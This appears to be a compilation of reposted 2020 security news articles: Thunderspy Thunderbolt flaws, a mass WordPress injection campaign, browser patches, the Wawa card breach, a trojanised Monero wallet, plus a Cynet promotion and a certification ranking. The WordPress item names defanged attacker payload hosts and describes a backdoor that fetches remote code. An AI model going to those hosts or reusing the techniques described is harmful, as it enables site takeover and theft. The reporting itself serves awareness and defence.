Cynet Offers IR Specialists Grants up to $1500 for each IR Engagement

In the past, the autonomous breach protection company Cynet announced that it is making Cynet 360 threat detection and response platform available at no charge for IR (incident response) service providers and consultants.


Today Cynet takes another step and announces a $500 grant for Incident Responders for each IR engagement in which Cynet 360 was used, with an additional $1,000 grant if the customer if the customer purchases an annual Cynet 360 subscription after the IR process is concluded.
Learn about this new offering here.


Incident response investigations come in a thousand different variations, but most can be broken down into two main parts. The first is discovering the few suspicious machines, user accounts, and network connections out of the mass activities within the attacked environment.


The second part follows these discoveries and involves a surgical-like collection and analysis of forensic artifacts to refute or validate the suspicion and if validated to disclose the full attack root cause and impact.


While IR pros have a wide array of commonly used open-source tools to perform a deep dive forensic investigation on a single or few suspicious machines, there is a crying shortage of available tools for the first part.


That’s mainly because to find the proverbial compromised needle in a haystack of a mostly non-compromised environment, one must have complete visibility into the entire process execution network traffic and user activity.


This is where Cynet 360 comes in. With an enterprise-grade distribution infrastructure providing seamless deployment across thousands of endpoints in minutes, Cynet 360 empowers responders to effortlessly gain the required visibility into the initial part of the investigation, easily pinpointing the entities that should be further investigated.


Cynet 360 provides incident responders with the following capabilities that cover both the investigation and the remediation parts of the response process.

Full Environment Visibility
  • Gain instant visibility into any host, files, process, Logs, network traffic, and user activities.
  • Get a verdict, attack scope, and all indicators immediately.
  • Use Cynet’s central management to distribute other open source IR tools across the environment.
Precise Threat Knowledge
  • Get real-time, accurate threat knowledge auto-generated by the Cynet 360 correlation engine.
  • For deep-dive investigations, leverage granular forensic tools to conduct an end-to-end investigation to determine the attack’s scope and impact.
  • Trust your own skills – Proactively hunt
Complete Recovery Actions
  • Isolate infected hosts, disable compromised user accounts, remove malicious files, and block risky network connections.
  • Craft your own remediation policies for automated threat block and removal.

Learn more about this new offering for incident responders here.



via:  thehackernews


Save pagePDF pageEmail pagePrint page

7 New Flaws Affect All Thunderbolt-equipped Computers Sold in the Last 9 Years

A cybersecurity researcher today uncovers a set of 7 new unpatchable hardware vulnerabilities that affect all desktops and laptops sold in the past 9 years with Thunderbolt, or Thunderbolt-compatible USB-C ports.

Collectively dubbed ‘ThunderSpy,’ the vulnerabilities can be exploited in 9 realistic evil-maid attack scenarios, primarily to steal data or read/write all of the system memory of a locked or sleeping computer—even when drives are protected with full disk encryption.

In a nutshell, if you think someone with a few minutes of physical access to your computer—regardless of the location—can cause any form of significant harm to you, you’re at risk for an evil maid attack.

According to Björn Ruytenberg of the Eindhoven University of Technology, the ThunderSpy attack “may require opening a target laptop’s case with a screwdriver, [but] it leaves no trace of intrusion and can be pulled off in just a few minutes.”


In other words, the flaw is not linked to the network activity or any related component, and thus can’t be exploited remotely.

“Thunderspy works even if you follow best security practices by locking or suspending your computer when leaving briefly, and if your system administrator has set up the device with Secure Boot, strong BIOS and operating system account passwords, and enabled full disk encryption,” the researcher said.

Besides any computer running Windows or Linux operating systems, Thunderbolt-powered Apple MacBooks, except retina versions, sold since 2011 are also vulnerable to Thunderspy attack, but partially.

ThunderSpy Vulnerabilities

The following list of seven Thunderspy vulnerabilities affects Thunderbolt versions 1, 2 and 3, and can be exploited to create arbitrary Thunderbolt device identities, clone user-authorized Thunderbolt devices, and finally, obtain PCIe connectivity to perform DMA attacks.

  1. Inadequate firmware verification schemes
  2. Weak device authentication scheme
  3. Use of unauthenticated device metadata
  4. Downgrade attack using backward compatibility
  5. Use of unauthenticated controller configurations
  6. SPI flash interface deficiencies
  7. No Thunderbolt security on Boot Camp

For those unaware, Direct memory access (DMA) attacks against the Thunderbolt port is not new and has previously been demonstrated with ThunderClap attacks.

DMA-based attacks let attackers compromise targeted computers in a matter of seconds just by plugging a malicious hot-plug devices—such as an external network card, mouse, keyboard, printer, or storage—into Thunderbolt port or the latest USB-C port.

In brief, DMA attacks are possible because Thunderbolt port works at a very low-level and with high privileged access to the computer, allowing connected peripherals to bypass operating system security policies and directly read/write system memory, which may contain sensitive information including your passwords, banking logins, private files, and browser activity.

thunderbolt intel hacking

To prevent DMA attacks, Intel introduced some countermeasures, and one of them was ‘security levels’ that prevents unauthorized Thunderbolt PCIe-based devices from connecting without user authorization.

“To further strengthen device authentication, the system is said to provide ‘cryptographic authentication of connections’ to prevent devices from spoofing user-authorized devices,” the researcher said.

However, by combining the first three Thunderspy flaws, an attacker can break the ‘security levels’ feature, and load an unauthorized malicious Thunderbolt device by forging Thunderbolt device identities, as shown in a video demonstration shared by Ruytenberg.

“Thunderbolt controllers store device metadata in a firmware section referred to as Device ROM (DROM). We have found that the DROM is not cryptographically verified. Following from the first issue, this vulnerability enables constructing forged Thunderbolt device identities,” he added.

“In addition, when combined with the second issue, forged identities may partially or fully comprise arbitrary data.”


“In addition, we show unauthenticated overriding of Security Level configurations, including the ability to disable Thunderbolt security entirely, and restoring Thunderbolt connectivity if the system is restricted to exclusively passing through USB and/or DisplayPort,” he added.

“We conclude this report by demonstrating the ability to permanently disable Thunderbolt security and block all future firmware updates.”

According to Ruytenberg, some latest systems available in market since 2019 include Kernel DMA protection that partially mitigates Thunderspy vulnerabilities.

To know if your system is affected by Thunderspy vulnerabilities, Ruytenberg has also released a free and open-source tool, called Spycheck.

Interestingly, when the researcher reported Thunderspy vulnerabilities to Intel, the chip company revealed it had already been aware of some of them—with no plans to patch or disclose it to the public.

Ruytenberg claims to have found more potential vulnerabilities in Thunderbolt protocol, which is currently are part of an ongoing researcher and expected to be revealed soon as ‘Thunderspy 2.’

In conclusion, if you consider yourself a potential target to evil-maid attacks and carrying a Thunderbolt system with you, always avoid leaving your devices unattended or power off the system completely, or at least consider using hibernation instead of sleep mode.

Besides this, if you want to be more paranoid, avoid leaving your Thunderbolt peripherals unattended or lending them to anybody.


via:  thehackernews


Save pagePDF pageEmail pagePrint page

Google Authenticator Users Can Now Transfer 2SV Secrets Between Devices

Google announced that Google Authenticator users can now transfer 2-Step Verification (2SV) secrets between devices.

The new feature is meant to make it easier for users to manage their Google Authenticator 2SV codes across multiple devices.

The 2SV secrets represent the data that is used to generate 2SV codes across devices that have Google Authenticator installed. With the new feature, users can transfer the data to a new device when upgrading, Google says.

The much anticipated feature is now available in the latest version of Google Authenticator on Android (version 5.10), the Internet company announced.

“Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode,” Google said.

Google Authenticator aims not only to provide an easy way to use 2SV on accounts, but also to improve the security of the login process, compared to options such as receiving passcodes via text messages.

To ensure that users can keep their accounts safe, Google also took a series of measures to minimize the attack surface in spite of the newly announced feature.

Thus, no data is sent to Google’s servers when the user transfers 2SV secrets, as the communication takes place between the two devices only.

“Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it,” the Internet giant notes.

Furthermore, alerting mechanisms and in-app logs were implemented, so as to make users fully aware of the fact that the transfer function has been used.


via:  securityweek


Save pagePDF pageEmail pagePrint page

Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities

A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.

The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.

Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.

“Due to the sheer volume and variety of attacks and sites that we’ve seen targeted, it is possible that your site may be exposed to these attacks, and the malicious actor will likely pivot to other vulnerabilities in the future,” Defiant says.

The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).

“Although it is not readily apparent why these vulnerabilities were targeted, this is a large scale campaign that could easily pivot to other targets,” Defiant says.

The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the victim has any WordPress login cookies set. The attackers hope that the script would be executed in an administrator’s browser.

Admins who are not logged in and are not on the login page are redirected to a malvertising site. Otherwise, the script attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.

The backdoor downloads another payload from https://stat[.]trackstatisticsss[.]com/n.txt and attempts to execute it by including it in the theme header.

“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” Defiant says.

The final payload used in this attack was designed to prepend a variant of the initial script to every JavaScript file on the site, as well as to all .htm, .html, and .php files named “index.” It also rechecks the infected site every 6,400 seconds and re-infects it if necessary.

Site owners are advised to keep all of their plugins updated and to deactivate and delete those plugins that have been removed from the WordPress plugin repository, to ensure their websites are protected.


via: securityweek


Save pagePDF pageEmail pagePrint page

Firefox 76 Brings Security Patches, Breached Password Alerts

Mozilla this week released Firefox 76 to the stable channel with an updated password manager, alerts for breached passwords, and patches for 11 vulnerabilities.

Starting with the new release, the browser aims to help users better keep their accounts secure and easily generate strong passwords, courtesy of the new Firefox Lockwise password manager.

On shared devices, the feature keeps passwords secure by prompting users for their account password before making saved logins available to them. Furthermore, the credentials are made available for five minutes only, Mozilla says.

The Lockwise dashboard, the browser maker explains, is powered by Firefox Monitor, which alerts users when their credentials were part of a data breach.

Firefox alerts users when one of the passwords they use is identical with a password that has been compromised, but also when the username and password were part of a breach (additional details about the breach are also included).

“Don’t worry, Firefox doesn’t know your actual passwords. This new feature automatically checks your encrypted list of passwords against the breached website information, helping you to stay on top of your online accounts that may have been compromised,” Mozilla explains.

The organization also points out that users can now leverage Firefox Lockwise to generate passwords of a minimum of 12 random letters, numbers and symbols.

Furthermore, Mozilla has made Firefox Lockwise available for iOS and Android as well, allowing users to access their passwords while on the go and easily sync their logins.

Firefox 76 also arrived with patches for 11 vulnerabilities, including three assessed with a critical severity rating.

The first of the critical bugs is a use-after-free during worker shutdown (CVE-2020-12387), which could lead to an exploitable crash, the second is a sandbox escape (CVE-2020-12388) that impacts Windows only, while the third (CVE-2020-12395) refers to memory safety bugs in both Firefox 75 and Firefox ESR 68.7.

The new browser release also patches three high severity issues (CVE-2020-12389 – sandbox escape; CVE-2020-6831 – buffer overflow; and CVE-2020-12396 – memory safety bugs), four moderate risk bugs (CVE-2020-12390 – incorrect serialization; CVE-2020-12391 – Content-Security-Policy bypass; CVE-2020-12392 – arbitrary local file access; CVE-2020-12393 – potential command injection), and one low severity issue (CVE-2020-12394 – URL spoofing in location bar when unfocussed).

This week, Google too released an update for its Chrome browser, to address a total of three vulnerabilities, including two reported by external researchers. Both of these bugs are high severity issues: CVE-2020-6831 – a stack buffer overflow in SCTP, and CVE-2020-6464 – type confusion in Blink.

via:  securityweek


Save pagePDF pageEmail pagePrint page

Microsoft Offering Up to $100,000 for Vulnerabilities in Azure Sphere

Microsoft announced a new security research challenge that encourages white hat hackers to find and responsibly disclose vulnerabilities in the company’s Azure Sphere solution.

Azure Sphere is an IoT security solution designed to provide end-to-end security across hardware, operating system and the cloud.

In an effort to identify potentially serious vulnerabilities in Azure Sphere, Microsoft has decided to run a three-month application-only challenge.

Hackers can apply for the Azure Sphere Research Challenge until May 15, and the challenge will run between June 1 and August 31. Researchers whose applications have been accepted will receive an email from Microsoft.

This new initiative, an expansion of the Azure Security Lab project announced last year, invites researchers to find vulnerabilities that would allow them to execute code on the Pluton security subsystem, which is the hardware-based secured root of trust for Azure Sphere, or in the Secure World operating environment of the Azure Sphere application platform. Microsoft is prepared to pay out up to $100,000 for these types of exploits.

While this research focuses on the Azure Sphere OS, vulnerabilities in other components could still receive a reward through the public Azure bug bounty program.

For the Azure Sphere Research Challenge, Microsoft has teamed up with several cybersecurity solutions providers, including Avira, Baidu, Bitdefender, Bugcrowd, Cisco, ESET, FireEye, F-Secure, HackerOne, K7 Computing, McAfee, Palo Alto Networks and Zscaler.

“While Azure Sphere implements security upfront and by default, Microsoft recognizes security is not a one-and-done event. Risks need to be mitigated consistently over the lifetime of a constantly growing array of devices and services. Engaging the security research community to research for high-impact vulnerabilities before the bad guys do is part of the holistic approach Azure Sphere is taking to minimize the risk,” Microsoft said.


via:  securityweek


Save pagePDF pageEmail pagePrint page

Top IT Certifications for 2020

Whether you’re new to the IT field or deep in the technology trenches, knowing what is hot and, sometimes more importantly, what is not, can be critical to the next step in your career path. That’s why we’ve got you covered with the latest and greatest certifications that should be on your radar, based on sales trends and unshakeable predictions from a team of experts. So, let’s dive in on what you should be looking to get certified in for 2020!

10. CompTIA Linux+ (XK0-004)

What is new is old again! With the resurgence of Linux distros in the security and cloud realms, it is little surprise that brushing up on your bash scripting and command-line troubleshooting is what employers want to see these days. CompTIA released a new version of their Linux+ certification in October, streamlining their previous two exams into one and adding in security ninja skills to XK0-004.

9. Microsoft MCSA SQL Development (70-76x)

Cloud databases may be all of the rage, but the basics are still in style. The staying power of Microsoft MCSA SQL Development (70-76x) is a strong testament to that. for database admins and developers is a strong testament to that. We predict that business intelligence solutions around Azure will grow to eventually replace this certification, but not anytime soon. Whether on-premises or in the cloud, this certification hasn’t lost its shine within the database market.

8. (ISC)2 CISSP (CAT, April 2018)

Despite interest in other specializations like CCSP and CSSLP, the CISSP continues to be the top dog in the security industry. Although slipping in this list compared to other IT certifications, CISSP remains a gold standard that any IT professional, especially in a management role, should consider. These initials are not disappearing from the thousands on LinkedIn anytime soon!

7. Cisco CCNA (200-301)

Although well-known in networking circles, the CCNA has remained the same certification program for many years now. But in the Summer of 2019, all of that changed with a new blueprint emphasizing cloud-based automation. You’ve got until February to test on the old CCNA exam objectives, but stay tuned for a huge update that will be sending network engineers scrambling to update their skills and prove their mettle in 2020!

6. Oracle 12c SQL OCA (1Z0-071)

From self-healing databases and automated cloud AI, the Oracle database has many bells and whistles and still remains a popular choice for large, multinational enterprises. Not without its controversial claims, there is no doubt it is a titan in the database realm, and skilled administrators are in high demand. This is one of the first exams needed to certify as an Oracle Certified Associate (OCA). We saw this title jump into the top ten last year and believe it is a trend we’ll continue to see in 2020.

5. Network+ (N10-007)

This may seem like a head-scratcher, but it is clearly based on our 2019 numbers that more newbies are willing to learn the dark arts of networking. Some of these can be explained away by the huge IoT demand and the growing needs to better support the infrastructure for these devices. As we become more connected, we’ll need to grow the workforce to ensure those connections stay reliable and secure. Also as part of what many consider a core understanding of cybersecurity starting in A+, Network+, and Security+, it is a great start to whatever branch of cybersecurity you are interested in. With that in mind, it’s good to see some growth in this introductory networking certification.

4. EC-Council CEH (v10)

Certified Ethical Hacker is still the ultimate in red team certification, enticing many a hacker into the cameras-lights-action of penetration testing. This is a great, high-level introductory look into the world of a white hat hacker, as it covers ethics, reporting, and a general review of the types of tools used. Though we predict that this certification will continue to grow in 2020, expect blue team related certifications like Certified Network Defender (CND) to rise as more organizations focus on automated protection and scanning over manual exploitation.

3. CompTIA Security+ (SY0-501)

As the IT skills gap, especially in the security space, continues to exist, more individuals will be gravitating to the field with little or no knowledge. Vendor-neutral certifications targeted at the entry-level, specifically well-known ones like Security+, will continue their popularity, as it is again part of the core understanding, of getting a high-level look through the field of cybersecurity. Now this certification has dropped a couple of spots since last year, mainly because more IT professionals are honing their existing skills or dipping their toes into more specialized security professions. If 2019 was the year of security, expect 2020 to re-emphasize traditional IT roles.

2. Microsoft MCSA Windows Server (70-74x)

This certification is also showing some age, but Windows system admins are still needed even in the age of Azure. So it is no surprise that this certification continues to be popular. We expect continued popularity in 2020, but we’re also watching the trend of companies moving toward machine learning to maintain their virtualized networking solutions. Although not as many companies adopted machine learning in 2019 as expected and it is not likely increase significantly in 2020. it is a long-term trend that we’re keeping our eyes on.

1. CompTIA A+ (220-100x)

The future in IT has never been greater with more advanced devices requiring more skilled technicians to manage them. The new 2019 exam emphasizes the newest technologies found in the field, making it a must for a full-fledged hardware technician, or anyone looking to hone their tech support skills. We expect to see this certification’s popularity only grow in 2020.

Honorable Mentions

CCNA CyberOps

This was a new Cisco specialization in 2018, but we’re finally seeing some growth here. Keep your eye on this space.

 

PMI-ACP

This agile project management certification is one of PMI’s fastest growing, but it’s still not as popular as other project management certs. In 2020, this certification will remain a force to be reckoned with, even as the field of agile certification continues to widen.

 

Microsoft MCSA Azure

The slew of new Azure certifications, hot on the heels of the huge moves from various enterprises, including the DoD, ensure this certification will only grow in 2020. By adding performance-based labs to these exams, expect to see more and more cloud admins/developers jump on the bandwagon.

 

CompTIA CySA+

Slow to catch on until late last year, this certification is now growing steadily. We have every reason to expect its popularity among candidates will only grow in 2020. This certification hits right below the CASP and above the Security+ as an interesting intersection between a security auditor and analyst.

 

via:  kaplanittraining


Save pagePDF pageEmail pagePrint page

Wawa Breach: Hackers Put 30 Million Stolen Payment Card Details for Sale

Remember the recent payment card breach at Wawa convenience stores?

If you’re among those millions of customers who shopped at any of 850 Wawa stores last year but haven’t yet hotlisted your cards, it’s high time to take immediate action.

That’s because hackers have finally put up payment card details of more than 30 million Wawa breach victims on sale at Joker’s Stash, one of the largest dark web marketplaces where cybercriminals buy and sell stolen payment card data.

As The Hacker News reported last month, on 10th December Wawa learned that its point-of-sale servers had malware installed since March 2019, which stole payment details of its customers from potentially all Wawa locations.


At that time, the company said it’s not aware of how many customers may have been affected in the nine-month-long breach or of any unauthorized use of payment card information as a result of the incident.

Now it turns out that the Wawa breach marked itself in the list of largest credit card breaches ever happened in the history of the United States, potentially exposing 30 million sets of payment records.


wawa credit card data breach

According to threat intelligence firm Gemini Advisory, on 27th January 2020, hackers started uploading stolen payment card data from Wawa at Joker’s Stash marketplace, titled as ‘BIGBADABOOM-III,’ which reportedly includes card numbers, expiration dates, and cardholder names.

“While the majority of those records were from US banks and were linked to US-based cardholders, some records also linked to cardholders from Latin America, Europe, and several Asian countries,”  Gemini Advisory said.

“Non-US-based cardholders likely fell victim to this breach when traveling to the United States and transacting with Wawa gas stations during the period of exposure.”

“The median price of US-issued records from this breach is currently $17, with some of the international records priced as high as $210 per card.”


In the latest statement released yesterday, Wawa confirmed that the company is aware of reports of criminal attempts to sell customers’ payment card data and to help further protect its customers, the company has ‘alerted payment card processors, payment card brands and card issuers to heighten fraud monitoring activities.’

“We continue to encourage our customers to remain vigilant in reviewing charges on their payment card statements and to promptly report any unauthorized use to the bank or financial institution that issued their payment card by calling the number on the back of the card,” Wawa said.

Customers who bought anything from any of the Wawa convenience stores between March and December last year are advised to block the affected cards and request a new one from your respective financial institution.


via:  thehackernews


Save pagePDF pageEmail pagePrint page

Critical Firefox 0-Day Under Active Attacks – Update Your Browser Now!

Attention! Are you using Firefox as your web browsing software on your Windows, Linux, or Mac systems?

If yes, you should immediately update your free and open-source Firefox web browser to the latest version available on Mozilla’s website.

Why the urgency? Mozilla earlier today released Firefox 72.0.1 and Firefox ESR 68.4.1 versions to patch a critical zero-day vulnerability in its browsing software that an undisclosed group of hackers is actively exploiting in the wild.

Tracked as ‘CVE-2019-17026,’ the bug is a critical ‘type confusion vulnerability’ that resides in the IonMonkey just-in-time (JIT) compiler of the Mozilla’s JavaScript engine SpiderMonkey.

In general, a type confusion vulnerability occurs when the code doesn’t verify what objects it is passed to and blindly uses it without checking its type, allowing attackers to crash the application or achieve code execution.

 

firefox vulnerability

Without revealing details about the security flaw and any details on the ongoing potential cyberattacks, Mozilla said, “incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to type confusion.”

That means, the issue in the vulnerable JavaScript engine component can be exploited by a remote attacker just by tricking an unsuspecting user into visiting a maliciously crafted web page to execute arbitrary code on the system within the context of the application.

 

The vulnerability was reported to Mozilla by cybersecurity researchers at Qihoo 360 ATA, who has also not yet released any information about their investigation, findings, and exploit.

Though Firefox, by default, automatically installs updates when they are available and activate a new version after a restart, you can always do a manual update using the built-in functionality by navigating to Menu > Help > About Mozilla Firefox.

 

via:  thehackernews


Save pagePDF pageEmail pagePrint page

Official Monero Site Hacked to Distribute Cryptocurrency Stealing Malware

monero website hacked

What an irony — someone hacked the official website of the Monero cryptocurrency project and quietly replaced legitimate Linux and Windows binaries available for download with malicious versions designed to steal funds from users’ wallets.

The latest supply-chain cyberattack was revealed on Monday after a Monero user spotted that the cryptographic hash for binaries he downloaded from the official site didn’t match the hashes listed on it.

Following an immediate investigation, the Monero team today also confirmed that its website, GetMonero.com, was indeed compromised, potentially affecting users who downloaded the CLI wallet between Monday 18th 2:30 am UTC and 4:30 pm UTC.


At this moment, it’s unclear how attackers managed to compromise the Monero website and how many users have been affected and lost their digital funds.

According to an analysis of the malicious binaries done by security researcher BartBlaze, attackers modified legitimate binaries to inject a few new functions in the software that executes after a user opens or creates a new wallet.


hacking monero cryptocurrency wallet

The malicious functions are programmed to automatically steal and send users’ wallet seed—sort of a secret key that restores access to the wallet—to a remote attacker-controlled server, allowing attackers to steal funds without any hassle.


“As far as I can see, it doesn’t seem to create any additional files or folders – it simply steals your seed and attempts to exfiltrate funds from your wallet,” the researcher said.

At least one GetMonero user on Reddit claimed to have lost funds worth $7000 after installing the malicious Linux binary.


I can confirm that the malicious binary is stealing coins. Roughly 9 hours after I ran the binary, a single transaction drained my wallet of all $7000,” the user wrote. “I downloaded the build yesterday around 6 pm Pacific time.”

GetMonero officials assured its users that the compromised files were online for a very short amount of time and that the binaries are now served from another safe source.


hacking monero cryptocurrency wallet

The officials also strongly advised users to check the hashes of their binaries for the Monero CLI software and delete the files if they don’t match the official ones.

“It’s strongly recommended to anyone who downloaded the CLI wallet from this website between Monday 18th 2:30 am UTC and 4:30 pm UTC, to check the hashes of their binaries,” GetMonero said.

“If they don’t match the official ones, delete the files and download them again. Do not run the compromised binaries for any reason.”

To learn how to verify hashes of the files on your Windows, Linux, or macOS system, you can head on to this detailed advisory by the official GetMonero team.

The identity of hackers is still unknown, and since the GetMonero team is currently investigating the incident, The Hacker News will update this article with any new developments.


Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.




via: thehackernews


Save pagePDF pageEmail pagePrint page